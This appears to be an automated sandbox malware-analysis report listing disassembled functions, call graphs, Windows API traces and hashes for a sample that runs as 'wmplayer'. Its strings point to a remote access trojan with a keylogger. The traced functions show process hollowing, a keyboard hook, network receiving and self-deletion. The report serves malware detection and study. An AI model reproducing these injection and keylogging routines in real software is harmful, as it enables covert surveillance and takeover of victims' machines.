                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                            • API String ID: 384173800-625181639
                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE
                                                                                            Function 00417245 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 290nativelibraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 447 417245-417262 448 417266-4172d9 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 447->448 449 4175cd 448->449 450 4172df-4172e6 448->450 451 4175cf-4175d9 449->451 450->449 452 4172ec-4172f3 450->452 452->449 453 4172f9-4172fb 452->453 453->449 454 417301-41732d call 436050 * 2 453->454 454->449 459 417333-41733e 454->459 459->449 460 417344-417374 CreateProcessW 459->460 461 4175c7 GetLastError 460->461 462 41737a-4173a2 VirtualAlloc Wow64GetThreadContext 460->462 461->449 463 417593-4175c5 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->463 464 4173a8-4173c8 ReadProcessMemory 462->464 463->449 464->463 465 4173ce-4173ee NtCreateSection 464->465 465->463 466 4173f4-417401 465->466 467 417403-41740e NtUnmapViewOfSection 466->467 468 417414-417436 NtMapViewOfSection 466->468 467->468 469 417477-41749e GetCurrentProcess NtMapViewOfSection 468->469 470 417438-417466 VirtualFree NtClose TerminateProcess 468->470 472 417591 469->472 473 4174a4-4174a6 469->473 470->449 471 41746c-417472 470->471 471->448 472->463 474 4174a8-4174ac 473->474 475 4174af-4174d6 call 435ad0 473->475 474->475 478 417516-417520 475->478 479 4174d8-4174e2 475->479 481 417522-417528 478->481 482 41753e-417542 478->482 480 4174e6-417509 call 435ad0 479->480 491 41750b-417512 480->491 481->482 484 41752a-41753b call 417651 481->484 485 417544-417560 WriteProcessMemory 482->485 486 417566-41757d Wow64SetThreadContext 482->486 484->482 485->463 489 417562 485->489 486->463 490 41757f-41758b ResumeThread 486->490 489->486 490->463 493 41758d-41758f 490->493 491->478 493->451
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                            • NtClose.NTDLL(?), ref: 0041744A
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                            • NtClose.NTDLL(?), ref: 004175B6
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                            • API String ID: 3150337530-3035715614
                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                            Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1638 4099e4-4099fd 1639 409a63-409a73 GetMessageA 1638->1639 1640 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1638->1640 1641 409a75-409a8d TranslateMessage DispatchMessageA 1639->1641 1642 409a8f 1639->1642 1640->1639 1643 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1640->1643 1641->1639 1641->1642 1644 409a91-409a96 1642->1644 1643->1644
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                            Strings
                                                                                            • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                            • String ID: Keylogger initialization failure: error
                                                                                            • API String ID: 3219506041-952744263
                                                                                            • Opcode ID: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                            • Opcode Fuzzy Hash: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                            Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1655 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1662 10001177-1000119e lstrlenW FindFirstFileW 1655->1662 1663 10001168-10001172 lstrlenW 1655->1663 1664 100011a0-100011a8 1662->1664 1665 100011e1-100011e9 1662->1665 1663->1662 1666 100011c7-100011d8 FindNextFileW 1664->1666 1667 100011aa-100011c4 call 10001000 1664->1667 1666->1664 1668 100011da-100011db FindClose 1666->1668 1667->1666 1668->1665
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 1083526818-0
                                                                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                            Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                            • API String ID: 2281282204-3981147832
                                                                                            • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                            • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                            Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                            • String ID:
                                                                                            • API String ID: 3525466593-0
                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                            Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 2532271599-1507639952
                                                                                            • Opcode ID: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                            • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                            • Opcode Fuzzy Hash: 15ad2142c8d53324ba778f00eb03576116a55d57072510ab0b369c8eb1ce1fae
                                                                                            • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                            Function 0040455B Relevance: 4.5, APIs: 3, Instructions: 28synchronizationnetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                            • SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 0040459F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventObjectSingleWaitrecv
                                                                                            • String ID:
                                                                                            • API String ID: 311754179-0
                                                                                            • Opcode ID: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                            • Instruction ID: 26c9fa113e50de76ad78d978a7fe27ea9b76c3f20528cd6e12f8aa4c3c3b2b63
                                                                                            • Opcode Fuzzy Hash: f607482e4343822148b028568a10a35340e8017a1e546fdda455ad4df8589c88
                                                                                            • Instruction Fuzzy Hash: 3FF08236108212BFD7018B14FC08E1AFBA2FB88721F10863AF614522A19771EC20DB59
                                                                                            Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Name$ComputerUser
                                                                                            • String ID:
                                                                                            • API String ID: 4229901323-0
                                                                                            • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                            • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                            Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                            • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                            Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 89 40d9b5-40d9bc 79->89 90 40d9ae-40d9b0 79->90 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 94 40d9c0-40d9cc call 41a463 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 99->79 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 142 40da13 call 4064d0 140->142 142->108 166 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 190 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->190 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 166->220 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 176 40dbc0-40dbe4 call 4022f8 call 4338c8 169->176 170->176 198 40dbf3 176->198 199 40dbe6-40dbf1 call 436050 176->199 190->163 204 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 258 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 204->258 273 40dd79-40dd7b 220->273 274 40dd5e 220->274 258->220 272 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 258->272 272->220 292 40dc93 272->292 277 40dd81 273->277 278 40dd7d-40dd7f 273->278 276 40dd60-40dd77 call 41beb0 CreateThread 274->276 279 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 276->279 277->279 278->276 330 40dea1 279->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 332->344 353 40df6c-40df7f call 401d64 call 401e8f 343->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->354 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 353->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 353->366 354->353 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 392 40e004-40e00b 389->392 393 40dff8-40e002 CreateThread 389->393 394 40e019-40e020 392->394 395 40e00d-40e017 CreateThread 392->395 393->392 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 413 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                            APIs
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                              • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                              • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                              • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
